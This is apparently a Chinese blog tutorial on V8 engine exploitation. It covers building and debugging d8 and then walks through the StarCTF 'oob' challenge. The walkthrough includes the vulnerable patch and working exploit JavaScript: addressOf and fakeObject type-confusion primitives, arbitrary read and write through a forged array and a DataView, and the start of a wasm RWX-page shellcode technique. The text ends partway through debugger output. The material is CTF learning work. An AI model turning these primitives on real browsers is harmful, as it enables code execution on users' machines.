Chorme-v8-入门学习

2021-09-17

字数统计: 9.9k字 | 阅读时长≈ 48分

很早之前，就想学习一些V8的知识，因为在之前研究Adobe Reader时对于JS引擎有过一些接触，当时就觉得里面涉及了很多的东西。现在总算下定决心，来系统的入门一下。

环境编译

万事开头难，首先就是要将V8的环境搭好，学会调试的方法。

chrome 里面的 JavaScript 解释器称为v8，我们做的pwn题主要面向的也是这个。这里搭建环境的步骤如下：

首先要知道，我们下载的源码称为V8，而V8经过编译之后得到的可执行文件为 d8。根据编译时选择的不同，编译出来的 d8 分为 debug版本和 release版本，一般把这两个版本都编译出来。

下载源码

由于需要去谷歌的网站上下载源码，所以需要保证虚拟机能够走代理。我这里直接设置允许局域网连接，将虚拟机设置为NAT，那么就可以上梯子。

随后，依次安装 depot_tools：

1 2	git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git echo 'export PATH=$PATH:"/root/depot_tools"' >> ~/.bashrc

这个工具是用来得到v8源码的。

ninja

这个工具是用来编译v8的：

1
2
3

git clone https://github.com/ninja-build/ninja.git
cd ninja && ./configure.py --bootstrap && cd ..
echo 'export PATH=$PATH:"/root/ninja"' >> ~/.bashr

然后就是重新加载环境变量。

最后就是去编译 V8 源代码：

1
2
3

fetch v8 && cd v8&& gclient sync
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug

最后编译出的输出在如下位置：

1 2	./out/x64.debug/d8 ./out/x64.debug/shell

加载补丁

上面的方法，只适用于编译最新的 V8代码。但是对于我们常见的调试漏洞或者解题，往往需要编译特定版本的 V8 或者加载相应的补丁。

需要用如下方法。

一般题目都会给出有漏洞的版本的commitid，所以编译之前先把源码的版本reset到和题目一致的版本，在把题目给出的diff文件应用到源码中：

git reset --hard 6dc88c191f5ecc5389dc26efa3ca0907faef3598
git apply < oob.diff
# 编译debug版本
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug d8
# 编译release版本
tools/dev/v8gen.py x64.release
ninja -C out.gn/x64.release d8

调试方法

成功编译 V8 后，我们还得了解如何调试 d8。

下断点

在使用gdb调试时需要开启allow-natives-syntax选项：

//方法一
winter@ubuntu:~/v8/v8/out.gn/x64.debug$ ./d8 --allow-natives-syntax 

//方法二
winter@ubuntu:~/v8/v8/out.gn/x64.debug$ gdb ./d8 
[...]
pwndbg> set args --allow-natives-syntax test.js

可以直接在 js代码中使用%DebugPrint();以及%SystemBreak();下断点。%SystemBreak()其作用是在调试的时候会断在这条语句这里，%DebugPrint() 则是用来打印对象的相关信息，在debug版本下会输出很详细的信息。

job命令

用于可视化显示JavaScript对象的内存结构。

gdb下使用：job 对象地址

telescope命令

功能：查看一下内存数据

使用：telescope 查看地址（长度）

基础知识

指针标记

V8 使用指针标记机制来区分指针、双精度数和 Smis(代表) immediate small integer

1
2
3

Double: Shown as the 64-bit binary representation without any changes
Smi: Represented as value << 32, i.e 0xdeadbeef is represented as 0xdeadbeef00000000
Pointers: Represented as addr & 1. 0x2233ad9c2ed8 is represented as 0x2233ad9c2ed9

因此，V8 中如果一个值表示的是指针，那么会将该值的最低bit 设置为1，所以其实真实的值需要减去 1.

Job 直接给对象地址就行，telescope 的时候，需要给真实值，需要 -1.

V8 对象结构

V8 中的对象有如下属性：

map: 定义了如何访问对象
prototype：	对象的原型（如果有）
elements：对象的地址
length：长度
properties：	属性，存有map和length

分析：

对象里存储的数据是在elemnts指向的内存区域的，而且是在对象的上面。也即，在内存申请上，V8先申请了一块内存存储元素内容，然后申请了一块内存存储这个数组的对象结构，对象中的elements指向了存储元素内容的内存地址。

map属性详解

对象的map (数组是对象)是一种数据结构，其中包含以下信息：

对象的动态类型，即 String，Uint8Array，HeapNumber 等
对象的大小，以字节为单位
对象的属性及其存储位置
数组元素的类型，例如 unboxed 的双精度数或带标记的指针
对象的原型（如果有）

属性名称通常存储在Map中，而属性值则存储在对象本身中几个可能区域之一中。然后，map将提供属性值在相应区域中的确切位置。

本质上，映射定义了应如何访问对象：

对于对象数组：存储的是每个对象的地址

对于浮点数组：以浮点数形式存储数值

所以，如果将对象数组的map换成浮点数组 -> 就变成了浮点数组，会以浮点数的形式存储对象的地址；如果将对浮点组的 map 换成对象数组 -> 就变成了对象数组，打印浮点数存储的地址。

对象和对象数组

也就是说，对象数组里面，存储的是别的对象的地址。

StarCTF oob

漏洞分析

这里题目直接给出了一个 oob.diff文件，如下所示：

diff --git a/src/bootstrapper.cc b/src/bootstrapper.cc
index b027d36..ef1002f 100644
--- a/src/bootstrapper.cc
+++ b/src/bootstrapper.cc
@@ -1668,6 +1668,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
                           Builtins::kArrayPrototypeCopyWithin, 2, false);
     SimpleInstallFunction(isolate_, proto, "fill",
                           Builtins::kArrayPrototypeFill, 1, false);
+    SimpleInstallFunction(isolate_, proto, "oob",
+                          Builtins::kArrayOob,2,false);
     SimpleInstallFunction(isolate_, proto, "find",
                           Builtins::kArrayPrototypeFind, 1, false);
     SimpleInstallFunction(isolate_, proto, "findIndex",
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index 8df340e..9b828ab 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -361,6 +361,27 @@ V8_WARN_UNUSED_RESULT Object GenericArrayPush(Isolate* isolate,
   return *final_length;
 }
 }  // namespace
+BUILTIN(ArrayOob){
+    uint32_t len = args.length();
+    if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
+    Handle<JSReceiver> receiver;
+    ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+            isolate, receiver, Object::ToObject(isolate, args.receiver()));
+    Handle<JSArray> array = Handle<JSArray>::cast(receiver);
+    FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
+    uint32_t length = static_cast<uint32_t>(array->length()->Number());
+    if(len == 1){
+        //read
+        return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
+    }else{
+        //write
+        Handle<Object> value;
+        ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+                isolate, value, Object::ToNumber(isolate, args.at<Object>(1)));
+        elements.set(length,value->Number());
+        return ReadOnlyRoots(isolate).undefined_value();
+    }
+}
 
 BUILTIN(ArrayPush) {
   HandleScope scope(isolate);
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 0447230..f113a81 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -368,6 +368,7 @@ namespace internal {
   TFJ(ArrayPrototypeFlat, SharedFunctionInfo::kDontAdaptArgumentsSentinel)     \
   /* https://tc39.github.io/proposal-flatMap/#sec-Array.prototype.flatMap */   \
   TFJ(ArrayPrototypeFlatMap, SharedFunctionInfo::kDontAdaptArgumentsSentinel)  \
+  CPP(ArrayOob)                                                                \
                                                                                \
   /* ArrayBuffer */                                                            \
   /* ES #sec-arraybuffer-constructor */                                        \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index ed1e4a5..c199e3a 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1680,6 +1680,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
       return Type::Receiver();
     case Builtins::kArrayUnshift:
       return t->cache_->kPositiveSafeInteger;
+    case Builtins::kArrayOob:
+      return Type::Receiver();
 
     // ArrayBuffer functions.
     case Builtins::kArrayBufferIsView:

现在我们依次分析一下这个文件有什么信息。这里的 +表示新增的内容，-表示删除的内容。

总体来说，这个文件实际就是增加了一个oob函数，主要分为三部分：定义、实现和关联。

定义

为数组添加名为oob的内置函数（用于调用），内部调用的函数名是kArrayOob(实现oob的函数)

1 2	+ SimpleInstallFunction(isolate_, proto, "oob", + Builtins::kArrayOob,2,false);

实现

函数将首先检查参数的数量是否大于2(第一个参数始终是 this 参数)。如果是，则返回 undefined。如果只有一个参数(this)，他将数组转换成FixedDoubleArray，然后返回array[length]。如果有两个参数(this 和 value)，它以 float形式将 value 写入 array[length]。

src/builtins/builtins-array.cc
+BUILTIN(ArrayOob){
+    uint32_t len = args.length();
+    if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
+    Handle<JSReceiver> receiver;
+    ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+            isolate, receiver, Object::ToObject(isolate, args.receiver()));
+    Handle<JSArray> array = Handle<JSArray>::cast(receiver);
+    FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
+    uint32_t length = static_cast<uint32_t>(array->length()->Number());
+    if(len == 1){
+        //read
+        return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
+    }else{
+        //write
+        Handle<Object> value;
+        ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+                isolate, value, Object::ToNumber(isolate, args.at<Object>(1)));
+        elements.set(length,value->Number());
+        return ReadOnlyRoots(isolate).undefined_value();
+    }
+}

那么这里就存在一个明显的数组越界，我们数组的下标应该是[0, length-1]。而这里我们能够修改arr[length]的值，那么就可以越界修改相邻的一个地址的值。

内存布局分析

这里，我们以一个例子来分析一个 js中的数组的内存布局：

var a = [1.1, 2.2, 3.3, 4];
%DebugPrint(a);
%SystemBreak();
var b = [1, 2, 3];
%DebugPrint(b);
%SystemBreak();
var c = [a, b]
%DebugPrint(c);
%SystemBreak();

我们用如下方式调试：

1 2	gdb ./d8 set args --allow-natives-syntax ./test.js

我们首先得到a的内存地址如下：

DebugPrint: 0x19c3df24de81: [JSArray]                                                   
 - map: 0x3d8592282ed9 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]                   
 - prototype: 0x2af07d411111 <JSArray[0]>                                               
 - elements: 0x19c3df24de51 <FixedDoubleArray[4]> [PACKED_DOUBLE_ELEMENTS]              
 - length: 4                                                                            
 - properties: 0x014e5acc0c71 <FixedArray[0]> {                                         
    #length: 0x3ae303c401a9 <AccessorInfo> (const accessor descriptor)                  
 }                                                                                      
 - elements: 0x19c3df24de51 <FixedDoubleArray[4]> {                                     
           0: 1.1                                                                       
           1: 2.2                                                                       
           2: 3.3                                                                       
           3: 4                                                                         
 }                                                                                      
0x3d8592282ed9: [Map]                                                                   
 - type: JS_ARRAY_TYPE                                                                  
 - instance size: 32                                                                    
 - inobject properties: 0                                                               
 - elements kind: PACKED_DOUBLE_ELEMENTS                                                
 - unused property fields: 0                                                            
 - enum length: invalid                                                                 
 - back pointer: 0x3d8592282e89 <Map(HOLEY_SMI_ELEMENTS)>                               
 - prototype_validity cell: 0x3ae303c40609 <Cell value= 1>                              
 - instance descriptors #1: 0x2af07d411f49 <DescriptorArray[1]>                         
 - layout descriptor: (nil)                                                             
 - transitions #1: 0x2af07d411eb9 <TransitionArray[4]>Transition array #1:              
     0x014e5acc4ba1 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_
ELEMENTS) -> 0x3d8592282f29 <Map(HOLEY_DOUBLE_ELEMENTS)>                                
                                                                                        
 - prototype: 0x2af07d411111 <JSArray[0]>                                               
 - constructor: 0x2af07d410ec1 <JSFunction Array (sfi = 0x3ae303c4aca1)>                
 - dependent code: 0x014e5acc02c1 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>           
 - construction counter: 0

这里可以看到一个对象结构布局如上述：

map: 定义了如何访问对象
prototype：	对象的原型（如果有）
elements：对象的地址
length：长度
properties：	属性，存有map和length

然后map类型的详细属性，也如下所示，这下面的内容解释还不够全面，后续我会做一个深入分析（希望，还能记得这个点。。。）

对象的动态类型，即 String，Uint8Array，HeapNumber 等
对象的大小，以字节为单位
对象的属性及其存储位置
数组元素的类型，例如 unboxed 的双精度数或带标记的指针
对象的原型（如果有）

接着，我们看一下element结构：

pwndbg> job 0x19c3df24de51                                        
0x19c3df24de51: [FixedDoubleArray]                                
 - map: 0x014e5acc14f9 <Map>                                      
 - length: 4                                                      
           0: 1.1                                                 
           1: 2.2                                                 
           2: 3.3                                                 
           3: 4                                                   
pwndbg> tele 0x19c3df24de50                                       
00:0000│  0x19c3df24de50 —▸ 0x14e5acc14f9 ◂— 0x14e5acc01          
01:0008│  0x19c3df24de58 ◂— 0x400000000                           
02:0010│  0x19c3df24de60 ◂— 0x3ff199999999999a                    
03:0018│  0x19c3df24de68 ◂— 0x400199999999999a                    
04:0020│  0x19c3df24de70 ◂— 'ffffff\n@'                           
05:0028│  0x19c3df24de78 ◂— 0x4010000000000000                    
06:0030│  0x19c3df24de80 —▸ 0x3d8592282ed9 ◂— 0x40000014e5acc01   
07:0038│  0x19c3df24de88 —▸ 0x14e5acc0c71 ◂— 0x14e5acc08          
pwndbg> p {double } 0x19c3df24de60                                
$6 = 1.1000000000000001                                           
pwndbg> p {double } 0x19c3df24de68                                
$7 = 2.2000000000000002                                           
pwndbg> p {double } 0x19c3df24de70                                
$8 = 3.2999999999999998                                           
pwndbg> p {double } 0x19c3df24de78                                
$9 = 4

从上面，可以看到element结构也首先有一个map类型，随后是数组长度，然后存储的是数组的每一项。

注意：这里有一个很重要的点，可以看到整个数组的JSArray的map类型是紧邻在 element类型的下面的，也即上面的0x19c3df24de80

。而结合，我们前面提到的漏洞点，那么可以很确定的得出我们可以通过数组越界去修改整个数组对象的 map结构地址。而，前面也提到了map的一个作用就是标识当前变量的类型，那么这里我们就可以利用修改map来修改一些变量的数据类型，达到类型混淆的作用。

但是，从上面的内存结构中，我们可以得到如下的一个内存布局：

	elemets--->			|				map						|<---------+
									-----------------------					 |
									|			length					|					 |
									-----------------------					 |
									|			element 1				|					 |
									-----------------------					 |
									|			elemnt 	2				|					 |
									-----------------------					 |
									|			...							|					 |
									-----------------------					 |
									|			element n				|					 |
									-----------------------					 |
ArrayObject--->		|			   map					|					 |
									-----------------------					 |
									|			 prototype			|					 |
									-----------------------					 |
									|			  elements			|----------+
									|											|
									-----------------------
									|			   length 			|
									-----------------------
									|			 properties			|
									-----------------------

前面，我们只是分析了浮点数组的结构。接着我们分析一下整数数组的结构，如下：

DebugPrint: 0x27c79100dea1: [JSArray]                                                   
 - map: 0x382a06402d99 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]                      
 - prototype: 0x120f2aa91111 <JSArray[0]>                                               
 - elements: 0x27c79100ddc1 <FixedArray[3]> [PACKED_SMI_ELEMENTS (COW)]                 
 - length: 3                                                                            
 - properties: 0x2afd89440c71 <FixedArray[0]> {                                         
    #length: 0x11f5167c01a9 <AccessorInfo> (const accessor descriptor)                  
 }                                                                                      
 - elements: 0x27c79100ddc1 <FixedArray[3]> {                                           
           0: 1                                                                         
           1: 2                                                                         
           2: 3                                                                         
 }                                                                                      
0x382a06402d99: [Map]                                                                   
 - type: JS_ARRAY_TYPE                                                                  
 - instance size: 32                                                                    
 - inobject properties: 0                                                               
 - elements kind: PACKED_SMI_ELEMENTS                                                   
 - unused property fields: 0                                                            
 - enum length: invalid                                                                 
 - back pointer: 0x2afd894404d1 <undefined>                                             
 - prototype_validity cell: 0x11f5167c0609 <Cell value= 1>                              
 - instance descriptors (own) #1: 0x120f2aa91f49 <DescriptorArray[1]>                   
 - layout descriptor: (nil)                                                             
 - transitions #1: 0x120f2aa91e59 <TransitionArray[4]>Transition array #1:              
     0x2afd89444ba1 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_SMI_ELE
MENTS) -> 0x382a06402e89 <Map(HOLEY_SMI_ELEMENTS)>                                      
                                                                                        
 - prototype: 0x120f2aa91111 <JSArray[0]>                                               
 - constructor: 0x120f2aa90ec1 <JSFunction Array (sfi = 0x11f5167caca1)>                
 - dependent code: 0x2afd894402c1 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>           
 - construction counter: 0

这里可以明显的看到ArrayObject的地址为0x27c79100dea1，而elements的地址为0x27c79100ddc1。所以，其也符合我们前面提到的存储结构。

接着，我们看一下对象数组，如下：

DebugPrint: 0x29f9d88dee1: [JSArray]                                                    
 - map: 0x3ac6f1802f79 <Map(PACKED_ELEMENTS)> [FastProperties]                          
 - prototype: 0x38f931291111 <JSArray[0]>                                               
 - elements: 0x029f9d88dec1 <FixedArray[2]> [PACKED_ELEMENTS]                           
 - length: 2                                                                            
 - properties: 0x3ad622580c71 <FixedArray[0]> {                                         
    #length: 0x1f589e6401a9 <AccessorInfo> (const accessor descriptor)                  
 }                                                                                      
 - elements: 0x029f9d88dec1 <FixedArray[2]> {                                           
           0: 0x029f9d88de81 <JSArray[4]>                                               
           1: 0x029f9d88dea1 <JSArray[3]>                                               
 }                                                                                      
0x3ac6f1802f79: [Map]                                                                   
 - type: JS_ARRAY_TYPE                                                                  
 - instance size: 32                                                                    
 - inobject properties: 0                                                               
 - elements kind: PACKED_ELEMENTS                                                       
 - unused property fields: 0                                                            
 - enum length: invalid                                                                 
 - back pointer: 0x3ac6f1802f29 <Map(HOLEY_DOUBLE_ELEMENTS)>                            
 - prototype_validity cell: 0x1f589e640609 <Cell value= 1>                              
 - instance descriptors #1: 0x38f931291f49 <DescriptorArray[1]>                         
 - layout descriptor: (nil)                                                             
 - transitions #1: 0x38f931291f19 <TransitionArray[4]>Transition array #1:              
     0x3ad622584ba1 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_ELEMENT
S) -> 0x3ac6f1802fc9 <Map(HOLEY_ELEMENTS)>                                              
                                                                                        
 - prototype: 0x38f931291111 <JSArray[0]>                                               
 - constructor: 0x38f931290ec1 <JSFunction Array (sfi = 0x1f589e64aca1)>                
 - dependent code: 0x3ad6225802c1 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>           
 - construction counter: 0                                                              

pwndbg> job 0x029f9d88de81                                                              
0x29f9d88de81: [JSArray]                                                                
 - map: 0x3ac6f1802ed9 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]                   
 - prototype: 0x38f931291111 <JSArray[0]>                                               
 - elements: 0x029f9d88de51 <FixedDoubleArray[4]> [PACKED_DOUBLE_ELEMENTS]              
 - length: 4                                                                            
 - properties: 0x3ad622580c71 <FixedArray[0]> {                                         
    #length: 0x1f589e6401a9 <AccessorInfo> (const accessor descriptor)                  
 }                                                                                      
 - elements: 0x029f9d88de51 <FixedDoubleArray[4]> {                                     
           0: 1.1                                                                       
           1: 2.2                                                                       
           2: 3.3                                                                       
           3: 4                                                                         
 }                                                                                      
pwndbg> job 0x029f9d88dea1                                                              
0x29f9d88dea1: [JSArray]                                                                
 - map: 0x3ac6f1802d99 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]                      
 - prototype: 0x38f931291111 <JSArray[0]>                                               
 - elements: 0x029f9d88ddc1 <FixedArray[3]> [PACKED_SMI_ELEMENTS (COW)]                 
 - length: 3                                                                            
 - properties: 0x3ad622580c71 <FixedArray[0]> {                                         
    #length: 0x1f589e6401a9 <AccessorInfo> (const accessor descriptor)                  
 }                                                                                      
 - elements: 0x029f9d88ddc1 <FixedArray[3]> {                                           
           0: 1                                                                         
           1: 2                                                                         
           2: 3                                                                         
 }

对象数组和数值数组还是有明显的区别。在对象数组中elements存储的就是一个个对象的地址。但是其基本的数据存储结构还是没有变化。

对象类型混淆测试

这里我们也可以写一个测试，来测试一下类型混淆是否可行：

var a = [1.1, 2,2];
%DebugPrint(a);
%SystemBreak();
var b = [1, 2];
var c = [a, b];
console.log(c[0]);
%DebugPrint(c);
%SystemBreak();

我们没有修改c的map的地址前，可以看到此时其输出c[0]是按照一个对象进行输出：

pwndbg> c                                                                               
Continuing.                                                                             
origin c[0] 1.1,2,2                                                                     
DebugPrint: 0x1edc6570dee1: [JSArray]                                                   
 - map: 0x03198f042f79 <Map(PACKED_ELEMENTS)> [FastProperties]                          
 - prototype: 0x3fe0fcb91111 <JSArray[0]>                                               
 - elements: 0x1edc6570dec1 <FixedArray[2]> [PACKED_ELEMENTS]                           
 - length: 2                                                                            
 - properties: 0x2213116c0c71 <FixedArray[0]> {                                         
    #length: 0x1dd3622401a9 <AccessorInfo> (const accessor descriptor)                  
 }                                                                                      
 - elements: 0x1edc6570dec1 <FixedArray[2]> {                                           
           0: 0x1edc6570de81 <JSArray[3]>                                               
           1: 0x1edc6570dea1 <JSArray[2]>                                               
 }                                                                                      
0x3198f042f79: [Map]                                                                    
 - type: JS_ARRAY_TYPE                                                                  
 - instance size: 32                                                                    
 - inobject properties: 0                                                               
 - elements kind: PACKED_ELEMENTS                                                       
 - unused property fields: 0                                                            
 - enum length: invalid                                                                 
 - back pointer: 0x03198f042f29 <Map(HOLEY_DOUBLE_ELEMENTS)>                            
 - prototype_validity cell: 0x1dd362240609 <Cell value= 1>                              
 - instance descriptors #1: 0x3fe0fcb91f49 <DescriptorArray[1]>                         
 - layout descriptor: (nil)                                                             
 - transitions #1: 0x3fe0fcb91f19 <TransitionArray[4]>Transition array #1:              
     0x2213116c4ba1 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_ELEMENT
S) -> 0x03198f042fc9 <Map(HOLEY_ELEMENTS)>                                              
                                                                                        
 - prototype: 0x3fe0fcb91111 <JSArray[0]>                                               
 - constructor: 0x3fe0fcb90ec1 <JSFunction Array (sfi = 0x1dd36224aca1)>                
 - dependent code: 0x2213116c02c1 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>           
 - construction counter: 0

接着，我们使用 set直接将c的map地址修改为a的 map地址，也就是将对象数组的类型修改为浮点数数组的类型：

0x3f98aecdfc9: [JSArray]
 - map: 0x016507e42f79 <Map(PACKED_ELEMENTS)> [FastProperties]
 - prototype: 0x3be78da51111 <JSArray[0]>
 - elements: 0x03f98aecdfa9 <FixedArray[2]> [PACKED_ELEMENTS]
 - length: 2
 - properties: 0x0c1e92c80c71 <FixedArray[0]> {
    #length: 0x2dbc933401a9 <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x03f98aecdfa9 <FixedArray[2]> {
           0: 0x03f98aecdf29 <JSArray[4]>
           1: 0x03f98aecdf89 <JSArray[6]>
 }

可以看到这里是能够混淆成功的。

漏洞测试

接着，我们来测试一下漏洞函数，看一下是否能够越界修改map值。

var a = [1, 2, 3, 4];
var data = a.oob();
console.log("[*] oob return data: "+data.toString());
a.oob(2);
%DebugPrint(a);
%SystemBreak();

利用分析

编写addressOf和fakeObject

首先定义两个全局的Float数组和对象数组，利用oob函数泄漏两个数组的Map类型

var obj = {"a": 1};
var obj_array = [obj];
var float_array = [1.1];
var obj_array_map = obj_array.oob();
var float_array_map = float_array.oob();

下面实现两个函数，addressOf泄漏给定对象的地址，其中f2i是float2int，1n表示BigNumber。fakeObject函数是将伪造的fake_object地址写入float_arr中。

function addressOf(obj)
{
    obj_arr[0] = obj;
    obj_arr.oob(float_array_map);//convert to float_arr
    let obj_addr =  f2i(obj_arr[0]-1n);  //read obj[0] is obj_addr
    obj_arr.oob(obj_array_map);	//recover to obj_arr
    return obj_addr;
}
function fakeObject(addr_to_fake)
{
    float_arr[0] = i2f(addr_to_fake+1n);	
    float_arr.oob(obj_array_map);	//convert to obj_arr
    let fake_obj = float_arr[0];	//get fake_obj
    float_arr.oob(float_array_map);	//recover to float arr
    return fake_obj;
}

addressOf泄漏地址方法：

1、将要泄漏对象的地址传递给对象数组obj_arr[0]，此时这里将会存储该地址；

2、利用oob函数修改对象数组obj_arr的map为float_map，将对象数组修改为浮点数数组；

3、读取obj_arr[0]，此时认为其是一个浮点数组，所以会直接输出obj_arr[0]处存储的地址

fakeObject将一个地址伪造为一个对象的方法：

1、将要伪造的地址赋值给浮点数数组float_arr[0]，此时这里将会直接存储该地址；

2、将该浮点数数组float_arr的map修改为obj_array_map，也即将其强制转换为对象数组；

3、读取float_arr[0]，此时就会将我们输入的地址当作一个对象返回给用户；

4、恢复float_arr为浮点数数组。

编写辅助函数

浮点数转整数、整数转浮点数、字节串表示整数

实现方法：开辟一块空间，创建两个数组，分别是浮点数组float64和整数数组bigUint64，他们公用创造的那块空间。

这样根据原来的形式放入对应的数组，用转换的数组输出即可。

var buf =new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
// 浮点数转换为64位无符号整数
function f2i(f)
{
    float64[0] = f;
    return bigUint64[0];
}
// 64位无符号整数转为浮点数
function i2f(i)
{
    bigUint64[0] = i;
    return float64[0];
}
// 64位无符号整数转为16进制字节串
function hex(i)
{
    return i.toString(16).padStart(16, "0");
}

注意V8会给内存地址 +1，所以泄漏 object地址的时候要将输出结果 -1。

同样在构造fake_obj的时候内存中存储的地址为addr+1，得到的obj是一个对象，就不必有什么 +/-操作了。

构造地址任意读写

我们结合上面的内存布局，来详细说明一下怎么进行对象伪造。

ArrayObject  ---->-------------------------+          
                  |      map               |          
                  +------------------------+          
                  |      prototype         |          
                  +------------------------+          
                  |      elements 指针      |          
                  |                        +
                  +------------------------+
                  |      length            |
                  +------------------------+
                  |      properties        |
                  +------------------------+

如果我们在一块内存上部署了上述虚假的内存属性，比如map、prototype、elements指针、length、properties属性，我们就可以用fakeObject把这块内存强制伪造成一个数组对象。

我们构造的这个对象的elements指针是可以控制的，如果我们将这个指针修改成我们想要访问的内存地址，那后续我们访问这个数组对象的内容，实际上就是访问我们修改后的内存地址指向的内容，这样也就实现了对任意指定地址的内容访问读写效果了。

下面是具体的构造：

我们首先创建一个float数组对象fake_array，可以用addressOf泄漏fake_array对象的地址，然后根据elements对象与fake_object的内存偏移，可以得出elements地址 = addressOf(fake_object) - (0x10+n*8)(这里的n 是元素个数)。而elements+0x10为实际存储元素的位置。

我们提前将fake_object构造为如下的形式：

var fake_array = [
    float_array_map,//fake to be a float arr object
    i2f(0n),
    i2f(0x41414141n),//fake obj's elements ptr
    i2f(0x1000000000n),
    1.1,
    2.2
];

则我们可以通过addressOf(fake_array) - 0x30计算得到存储数据元素内容的地址，然后使用fakeObject将这个地址转换为对象fake_obj，之后我们访问fake_obj[0]，实际上访问的就是0x41414141 + 0x10的内容（注意实际的元素存储在elements+0x10处）

下面是地址任意读写的实现：

//这块内存我们可以控制
var fake_array = [
    float_array_map,
    i2f(0n),
    i2f(0x41414141n),//fake obj's elements ptr
    i2f(0x1000000000n),
    1.1,
    2.2
];

//获取到这块内存的地址
var fake_arr_addr = addressOf(fake_array);
//将可控内存转换为对象
var fake_object_addr = fake_arr_addr - 0x40n + 0x10n;
var fake_object = fakeObject(fake_object_addr);

//arbitray Read
function read64(addr)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    let leak_data = f2i(fake_object[0]);
    //console.log("[*] leak from: 0x" +hex(addr) + ": 0x" + hex(leak_data));
    return leak_data;
}
//arbitray write
function write64(addr,data)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    fake_object[0] = i2f(data);
    //console.log("[*] write to : 0x" +hex(addr) + ": 0x" + hex(data));
}

这里解释一下这里任意读写的实现。首先，我们自己在内存中伪造了一个fake_array数组，这个数组最开始是浮点数数组。然后我们通过addressOf获取fake_array的地址fake_arr_addr。随后，将fake_arr_addr - 0x40 +0x10即 fake_arr_addr - 0x30，这里是因为我们伪造的fake_array对象总共就6个元素，占0x30，而我们对于fake_array能够控制的就是这6个元素。这里我们用addressOf返回的fake_arr_addr是这个数组结构体开头的map地址，所以要减去0x30，使其得到elements的地址。最后使用fakeObject将这个地址fake_object_addr转换为一个对象地址fake_object其类型是浮点数数组，这样我们后续就能够通过修改fake_arr的元素，来任意修改我们伪造的这个对象fake_obejct的各个内容了。

任意读的实现方法：

1、将需要读的地址 addr-0x10，赋值给fake_array[2]，这里为什么要减0x10，是因为我们输入一个对象的头地址map_addr，而想要输出的elemets = map_addr + 0x10，而我们输出时是输出elements的值；

2、读取fake_object[0]，此时会将addr的值以浮点数输出。

任意地址写同理。

测试代码可以发现已经能够任意读写：

var a = [1.1,2.2,3.3];
%DebugPrint(a);
var a_addr = addressOf(a);
console.log("[*] addressOf a: 0x" + hex(a_addr));

read64(a_addr);
%SystemBreak();

write64(a_addr,0x01020304n);
%SystemBreak();

任意写改进

通过上面的方式任意地址写，在写0x7fxxxxx这样的高地址的时候会出现问题，地址的低位会被修改，导致出现访问异常。

解决：DataView对象中的backing_store会指向申请的data_buf(backing_store相当于我们的elements)，修改backing_store为我们想要写的地址，并通过DataView对象的setBigUint64方法就可以往指定地址正常写入数据了。

var data_buf = new ArrayBuffer(8);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) + 0x20n;
function writeDataview(addr,data){
    write64(buf_backing_store_addr, addr);
    data_view.setBigUint64(0, data, true);
    console.log("[*] write to : 0x" +hex(addr) + ": 0x" + hex(data));
}

浏览器运行shell code：wasm

wasm是让JavaScript直接执行高级语言生成的机器码的一种技术。

步骤：

1、首先加载一段wasm代码到内存中；

2、然后通过addressOf找到存放的wasm的内存地址

3、接着通过任意地址写原语用shellcode替换原本wasm的代码内容；

4、最后调用wasm 的函数接口即可触发调用shellcode

寻找存放wasm代码的内存页地址

通过Function -> shared_info -> WasmExportedFunctionData -> instance，在instance+0x88的固定偏移处，就能读取到存储wasm代码的内存页地址起始地址。

//test.js，用debug版本调试
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
%DebugPrint(f);
%SystemBreak();

经过调试，可以通过如下地址链，最终找到存储wasm的rwx页面。

DebugPrint: 0x33d55dc9fab9: [Function] in OldSpace                           
 - map: 0x2d22d4b84379 <Map(HOLEY_ELEMENTS)> [FastProperties]                
 - prototype: 0x33d55dc82109 <JSFunction (sfi = 0xdf20b188039)>              
